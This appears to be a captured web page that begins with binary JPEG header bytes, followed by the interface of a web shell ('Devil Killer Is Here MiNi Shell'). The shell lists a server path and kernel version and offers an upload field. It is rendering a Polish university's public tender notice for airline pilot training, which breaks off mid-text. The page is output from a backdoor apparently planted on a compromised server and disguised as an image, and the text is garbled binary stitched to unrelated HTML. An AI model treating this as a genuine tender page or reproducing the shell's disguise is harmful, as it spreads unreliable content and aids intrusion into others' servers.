JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250120/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250120/0004780501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa zintegrowanego szkolenia lotniczego studentów specjalności pilotaż statków powietrznych PP na samolocie typu MEP(L), symulatorze FNPT II, do licencji ATPL(A) na 12 mies. z podziałem na części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Poznańska</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamowień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001608</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Marii Skłodowskiej-Curie 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">60-965</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">agnieszka.slesinska@put.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.put.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa zintegrowanego szkolenia lotniczego studentów specjalności pilotaż statków powietrznych PP na samolocie typu MEP(L), symulatorze FNPT II, do licencji ATPL(A) na 12 mies. z podziałem na części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e038c44a-6462-4487-85f5-27673a7cc8ad</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00047805</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00580212/72/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.28 „Usługa zintegrowanego szkolenia lotniczego studentów specjalności pilotaż statków powietrznych PP na samolocie typu MEP(L), symulatorze FNPT II, do licencji ATPL(A) na okres 12 msc (pakiety)”.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e038c44a-6462-4487-85f5-27673a7cc8ad <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu Platformy (adres poczty elektronicznej: agnieszka.slesinska@put.poznan.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako<br/>załączniki do jednego formularza). Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.<br/>Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz<br/>zalogowania się na Platformie e-Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie przepisów Rozporządzenia Parlamentu Europejskiego i Rady (EU)<br/>2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (zwanego dalej „RODO”) Wykonawca<br/>oświadcza, że został poinformowany o tym, iż:<br/>1) Administratorem danych osobowych jest Politechnika Poznańska z siedzibą Pl. Marii Skłodowskiej-Curie 5, e-mail:<br/>biuro.rektora@put.poznan.pl, telefon: 61 665 3639,<br/>2) Administrator wyznaczył Inspektora Ochrony Danych – Pana Piotra Otomańskiego, który nadzoruje prawidłowość przetwarzania<br/>danych osobowych na Politechnice Poznańskiej. Z IOD można kontaktować się mailowo, wysyłając wiadomość na adres:<br/>iod@put.poznan.pl.,<br/>3) Dane osobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. b, c, e i f RODO, w celu:<br/>a) dysponowania danymi osobowymi, przez okres poprzedzający zawarcie Umowy dla potrzeb złożenia oferty lub negocjacji oraz<br/>przez okres wykonywania Umowy, jej realizacji, rozliczenia, koordynacji przez osoby fizyczne wskazane do kontaktów roboczych,<br/>b) wypełnienie obowiązków prawnych ciążących na administratorze, w szczególności wynikających z przepisów<br/>rachunkowopodatkowych;<br/>z obowiązku archiwizacyjnego, zgodnie z obowiązującymi przepisami prawa,<br/>c) wykonanie zadania realizowanego w interesie publicznym, polegającego w szczególności na prowadzeniu działalności naukowej,<br/>świadczeniu usług badawczych oraz transferu wiedzy i technologii do gospodarki,<br/>d) w celu ustalenia, dochodzenia lub obrony przed ewentualnymi roszczeniami z tytułu realizacji umowy, stanowiących prawnie<br/>uzasadniony interes administratora,<br/>4) Źródłem danych osobowych może być osoba, której dane dotyczą, ale również Strona umowy. Przetwarzane będą następujące<br/>kategorie danych: dane osobowe reprezentantów, pracowników/współpracowników – wskazane w treści umowy lub inne dane<br/>kontaktowe niezbędne do jej realizacji, koordynacji i rozliczenia, w szczególności: imię i nazwisko, e-mail służbowy, nr telefonu,<br/>stopień/tytuł naukowy, funkcja/stanowisko i miejsce pracy.<br/>5) Odbiorcami danych mogą być:<br/>a) organy publiczne i urzędy państwowe lub inne podmioty upoważnione na podstawie przepisów prawa lub wykonujące zadania<br/>realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej,<br/>b) inne podmioty, które na podstawie stosownych umów podpisanych z Politechniką Poznańską przetwarzają dane osobowe dla<br/>których administratorem jest Politechnika Poznańska, w szczególności podmioty świadczące dla Administratora obsługę<br/>informatyczną,<br/>6) Administrator będzie przechowywał dane osobowe przez okres niezbędny do udokumentowania czynności z udziałem osób,których dane dotyczą, w związku z podjęciem działań przed zawarciem umowy i jej wykonywania, przez okres wynikający z przepisów rachunkowo-podatkowych. W przypadku potrzeby ustalenia, dochodzenia lub obrony przed roszczeniami z tytułu<br/>realizacji niniejszej umowy, do czasu przedawnienia ewentualnych roszczeń. Dokumentacja będzie podlegała archiwizacji, zgodnie z<br/>obowiązującymi przepisami prawa,<br/>7) W związku z przetwarzaniem danych osobowych, osobom, których dane dotyczą, przysługują (na zasadach określonych w<br/>RODO) następujące uprawnienia: prawo dostępu do treści swoich danych osobowych, sprzeciwu, prawo ich sprostowania,<br/>usunięcia, przenoszenia oraz ograniczenia przetwarzania oraz prawo do złożenia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych,<br/>8) Dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej,<br/>9) Podanie danych osobowych jest dobrowolne, ale też niezbędne do zawarcia oraz realizacji umowy,<br/>10) Dane osobowe nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AD/ZP/10/25</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.12.) Maksymalna liczba części, jaka może zostać udzielona jednemu wykonawcy: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Usługa zintegrowanego szkolenia lotniczego studentów specjalności pilotaż statków powietrznych Politechniki Poznańskiej na samolocie typu MEP(L), symulatorze FNPT II, do licencji ATPL(A) na okres 12<br/>miesięcy z podziałem na części (pakiety)”.<br/>Część 1 - prowadzenie przez instruktora szkolenia na symulatorze FNPT II – Szkolenie na samolocie wielosilnikowym VFR/ME(E4Z3) prowadzenie przez instruktora szkolenia na samolocie MEP(L)VFR – Szkolenie na samolocie wielosilnikowym VFR/ME(E4Z3) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80650000-5 - Szkolenie i symulacja w zakresie samolotów, rakiet (pocisków rakietowych) i statków kosmicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zgodnie z art. 441 ustawy Prawo zamówień publicznych Zamawiający przy realizacji przedmiotu zamówienia przewiduje wykorzystanie prawa opcji. <br/>2.	Zakres rzeczowy i ilościowy przedmiotu zamówienia składa się z zamówienia podstawowego i zamówienia opcjonalnego, które zostały określone odpowiednio w załącznikach Formularz cenowy nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ<br/>3.	Ilość godzin w zamówieniu podstawowym i w zamówieniu objętym prawem opcji podana w Formularzu cenowym - stanowiącym odpowiednio załączniki nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ jest ilością prognozowaną, podaną w celu obliczenia ceny ofertowej i określenia maksymalnego pułapu wartości zobowiązania Zamawiającego wobec Wykonawcy. Zamawiający dopuszcza możliwość zmiany/zamiany/przekroczenia liczby poszczególnych godzin z zastrzeżeniem, iż łączna wartość ilość godzin szkolenia dla zamówienia podstawowego nie może przekroczyć kwoty określonej w § 5 ust. 1 wzoru umowy, z zastrzeżeniem § 4 ust. 4, natomiast dla zamówienia objętego prawem opcji nie może przekroczyć kwoty określonej w § 5 ust. 1 wzoru umowy.<br/>4.	Zamawiający zapłaci Wykonawcy jedynie za rzeczywistą ilość godzin szkoleniowych.<br/>5.	W ramach Opcji, wedle wyboru Zamawiającego, mogą zostać zamówione wszystkie, niektóre lub jedna godzina szkolenia z wskazanych przez Zamawiającego jako zamówienie opcjonalne w Formularzu Cenowym stanowiącym załącznik nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV).<br/>6.	Z prawa opcji Zamawiający będzie korzystał, gdy zajdzie taka konieczność, w zależności od potrzeb.<br/>7.	Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamówienie objęte prawem opcji będzie realizowane po cenach wskazanych przez Wykonawcę w formularzu cenowym (załączniki nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV). Zamawiający będzie realizował płatności za faktyczne zrealizowane godziny nalotu, potwierdzone w Elektronicznym Zapisie Lotów (EZL), a Wykonawcy nie będą przysługiwały żadne roszczenia z tytułu zmniejszenia liczby godzin nalotu, niż to określono w przedmiocie zamówienia. Jednocześnie Zamawiający zobowiązuje się do realizacji zamówienia w zakresie co najmniej 10% ceny umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował kryteriami oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Usługa zintegrowanego szkolenia lotniczego studentów specjalności pilotaż statków powietrznych Politechniki Poznańskiej na samolocie typu MEP(L), symulatorze FNPT II, do licencji ATPL(A) na okres 12 miesięcy z podziałem na części (pakiety)”.<br/>Część 2 - prowadzenie przez instruktora szkolenia na symulatorze FNPT II – Szkolenie na samolocie wielosilnikowym VFR/ME(E4Z3) prowadzenie przez instruktora szkolenia na samolocie MEP(L)VFR – Szkolenie na samolocie wielosilnikowym VFR/ME(E4Z3) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80650000-5 - Szkolenie i symulacja w zakresie samolotów, rakiet (pocisków rakietowych) i statków kosmicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zgodnie z art. 441 ustawy Prawo zamówień publicznych Zamawiający przy realizacji przedmiotu zamówienia przewiduje wykorzystanie prawa opcji. <br/>2.	Zakres rzeczowy i ilościowy przedmiotu zamówienia składa się z zamówienia podstawowego i zamówienia opcjonalnego, które zostały określone odpowiednio w załącznikach Formularz cenowy nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ<br/>3.	Ilość godzin w zamówieniu podstawowym i w zamówieniu objętym prawem opcji podana w Formularzu cenowym - stanowiącym odpowiednio załączniki nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ jest ilością prognozowaną, podaną w celu obliczenia ceny ofertowej i określenia maksymalnego pułapu wartości zobowiązania Zamawiającego wobec Wykonawcy. Zamawiający dopuszcza możliwość zmiany/zamiany/przekroczenia liczby poszczególnych godzin z zastrzeżeniem, iż łączna wartość ilość godzin szkolenia dla zamówienia podstawowego nie może przekroczyć kwoty określonej w § 5 ust. 1 wzoru umowy, z zastrzeżeniem § 4 ust. 4, natomiast dla zamówienia objętego prawem opcji nie może przekroczyć kwoty określonej w § 5 ust. 1 wzoru umowy.<br/>4.	Zamawiający zapłaci Wykonawcy jedynie za rzeczywistą ilość godzin szkoleniowych.<br/>5.	W ramach Opcji, wedle wyboru Zamawiającego, mogą zostać zamówione wszystkie, niektóre lub jedna godzina szkolenia z wskazanych przez Zamawiającego jako zamówienie opcjonalne w Formularzu Cenowym stanowiącym załącznik nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV).<br/>6.	Z prawa opcji Zamawiający będzie korzystał, gdy zajdzie taka konieczność, w zależności od potrzeb.<br/>7.	Zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązują przy realizacji zamówienia podstawowego. Zamówienie objęte prawem opcji będzie realizowane po cenach wskazanych przez Wykonawcę w formularzu cenowym (załączniki nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV). Zamawiający będzie realizował płatności za faktyczne zrealizowane godziny nalotu, potwierdzone w Elektronicznym Zapisie Lotów (EZL), a Wykonawcy nie będą przysługiwały żadne roszczenia z tytułu zmniejszenia liczby godzin nalotu, niż to określono w przedmiocie zamówienia. Jednocześnie Zamawiający zobowiązuje się do realizacji zamówienia w zakresie co najmniej 10% ceny umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował kryteriami oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Usługa zintegrowanego szkolenia lotniczego studentów specjalności pilotaż statków powietrznych Politechniki Poznańskiej na samolocie typu MEP(L), symulatorze FNPT II, do licencji ATPL(A) na okres 12 miesięcy z podziałem na części (pakiety)”.<br/>Część 3 - prowadzenie przez instruktora szkolenia na symulatorze FNPT II – Szkolenie na samolocie wielosilnikowym MEP(L)/IFR prowadzenie przez instruktora szkolenia na samolocie MEP(L)IFR – Szkolenie na samolocie wielosilnikowym IFR/ME(E4Z4). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80650000-5 - Szkolenie i symulacja w zakresie samolotów, rakiet (pocisków rakietowych) i statków kosmicznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zgodnie z art. 441 ustawy Prawo zamówień publicznych Zamawiający przy realizacji przedmiotu zamówienia przewiduje wykorzystanie prawa opcji. <br/>2.	Zakres rzeczowy i ilościowy przedmiotu zamówienia składa się z zamówienia podstawowego i zamówienia opcjonalnego, które zostały określone odpowiednio w załącznikach Formularz cenowy nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ<br/>3.	Ilość godzin w zamówieniu podstawowym i w zamówieniu objętym prawem opcji podana w Formularzu cenowym - stanowiącym odpowiednio załączniki nr 8a(PAKIET I), 8b(PAKIET II), 8c(PAKIET III), 8d(PAKIET IV) do SWZ jest ilością prognozowaną, podaną w celu obliczenia ceny ofertowej i określenia maksymalnego pułapu wartości zobowiązania Zamawiającego wobec Wykonawcy. Zamawiający dopuszcza możliwość zmiany/zamiany/przekroczenia liczby poszczególnych godzin z zastrzeżeniem, iż łączna 